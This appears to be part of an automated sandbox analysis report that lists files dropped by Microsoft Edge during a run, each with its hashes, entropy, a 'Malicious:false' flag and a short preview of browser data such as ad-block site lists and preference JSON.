                                                                                                                                                                                                                                                                              Entropy (8bit):6.103549110629139
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynSPGWv/sxtwfj7VLyMV/YoskFoz:z/0+zI7ynGv/4KnVeZoskG
                                                                                                                                                                                                                                                                              MD5:F263B751997282FC006CE4B5999E237F
                                                                                                                                                                                                                                                                              SHA1:EC62C3CFEA42F51E2BF75590208DB932B0E81343
                                                                                                                                                                                                                                                                              SHA-256:30AABDB5ED5C0C5C6E370DB38083F5EF40A6984F72793B3E32477B9A391BC2D0
                                                                                                                                                                                                                                                                              SHA-512:27686BBFE1EB90D8C02926C9317896263DDF2A057822CF360247D2A9E6BF057E67D63ACBC4BA245D30DEF66092BF5A23231CE0E3790F6CFCDE8C9652A0B05F07
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\f6b03337-91cb-44ca-9f00-0991e1e73b6e.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67651FD4-1D44.pma

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.4462035509527405
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:m/EUUaUwRkceegT08wW/v1qR5UGWESaH:Okc2T9qO4
                                                                                                                                                                                                                                                                              MD5:9791B53FF87C36C605CA46B10E23F376
                                                                                                                                                                                                                                                                              SHA1:C89FA8E56C650E2EE6C00BB73453CB836FC25EF4
                                                                                                                                                                                                                                                                              SHA-256:261B0B339788EC94DD47BBE6524BF5BF05D3DF56ABCCDD2CD7C31F38E83E4180
                                                                                                                                                                                                                                                                              SHA-512:D4CA66DCEAE87A59C8D34BA79C3D52D163376E1BB3390F4DF8E81AD07A0299A78D9110912216317B53A1141553246C532CA5EF1906C55C97C8F4CFF333CE0CC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@...............p..................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".nmuwdd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........V...... .2..........

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67651FD4-D34.pma

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.04727271171294309
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:wRQ0m5tmFnOAUpYIJPi6VBKP7+HfgHXl/ILMkYTwgh81MNH+zRQcD/OxRvzn8y0d:SQ0Ute2N4hJhHgVf2vz08T2RGOD
                                                                                                                                                                                                                                                                              MD5:D15C1F7B6EECB63EAA5DC34EF208C94F
                                                                                                                                                                                                                                                                              SHA1:888193E5C8D7B45873B337FA969B9E455EBF1F4C
                                                                                                                                                                                                                                                                              SHA-256:738551FAC012C36128BDD5818E065D3F86FBAAE2C64B7B7B88E376B510109721
                                                                                                                                                                                                                                                                              SHA-512:19E19CBE8407783BBCC77D494FACCCF239E7A9735714A5CAE33CF924B1CBE56A8BB1FB0B169C1D1495B880D19D30C90D4B7E4AF2B94262F900843C25E37CC8BD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...@..@...@.....C.].....@...............xj..0Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".nmuwdd20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2..........I...... .`2...........

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                                                                              Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                              MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                              SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                              SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                              SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\10307d6b-207e-4b2e-80a1-2e3c2af86d6e.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3819750a-5730-4102-8ddf-bfc969381a05.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\42cf6e86-0657-44d9-b604-222d57b67dc2.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9574
                                                                                                                                                                                                                                                                              Entropy (8bit):5.110007633087676
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0kdpNspFyaNP9ktCM+68WbV+FedQAq2+PyYJ:st0QNspFtJ0bGkQqM
                                                                                                                                                                                                                                                                              MD5:4AE900B76E77FD4AA8C168C44E82BCE3
                                                                                                                                                                                                                                                                              SHA1:8462F40820135A70F5C8CB9C5E231151489E7097
                                                                                                                                                                                                                                                                              SHA-256:5B60FC3A130DBA4B6495325A5E6233D53D812563151771E023A50DA924468A42
                                                                                                                                                                                                                                                                              SHA-512:16D6EA6ACB44E6D60FC0E92B24D160E35934AD1F57F5AF1F2812E4BABCAB74A8A1F14C64A9F8094A24E568CB32B59D6444DD043F82F67E52519E388AB326BFAE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\435686b5-ea37-4cc7-b73e-c1201f79a107.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                              Entropy (8bit):5.567332610294245
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:768:O4biuUWPxZftI8F1+UoAYDCx9Tuqh0VfUC9xbog/OV2DPE8rwU2p8ftur:O4biuUWPxZftIu1ja3DE1+ftE
                                                                                                                                                                                                                                                                              MD5:6A0E894DD7C4EC49A9D96BB1A55B5796
                                                                                                                                                                                                                                                                              SHA1:748B0908F3ECD3B4EF79DD8B499033E19C03AA1A
                                                                                                                                                                                                                                                                              SHA-256:1A90647A66DBB407C24BFB63C7AC206F32B7084FCF0B4C6A270CB935681EB414
                                                                                                                                                                                                                                                                              SHA-512:605AB18E140E4D1D3EBC55449AB3E629F70E29D7259418E8A80EE6474D66AAD730EA4031D9ECCF07ED89F033CC6CABF2D446A00659CF4B4D67A80C5F6FB4ACC8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379154132664972","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379154132664972","location":5,"ma

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\50f18fb4-4233-4f79-96c3-ff390458c787.tmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (17550), with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):17554
                                                                                                                                                                                                                                                                              Entropy (8bit):5.49199255450566
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st0J99QTryDiuabatSuypNspFyaNPWc+ktaNNPhACnNWcVCUD913nho68WbV+FeI:st0PGQSu4NspFtJWzVCU/nbGkQwPFM
                                                                                                                                                                                                                                                                              MD5:0CFBDD3B35096AA328079A7D69410386
                                                                                                                                                                                                                                                                              SHA1:2E436462FE2B3A7A103F2F7E11A6F2378DD72EB6
                                                                                                                                                                                                                                                                              SHA-256:9B744C2C4CF4769AABDF489F3D21EC672BD351472ABCB31B34E7D2E151F1E04E
                                                                                                                                                                                                                                                                              SHA-512:F1CB232445BAA493E79566D1D036200A36797FB549F3739507CA1E66FC81F9608C22AFEF18D69FB73370ED612FEF13CBDEA3DEC8F9C43431AB348543B287AFD5
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379154133170644","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
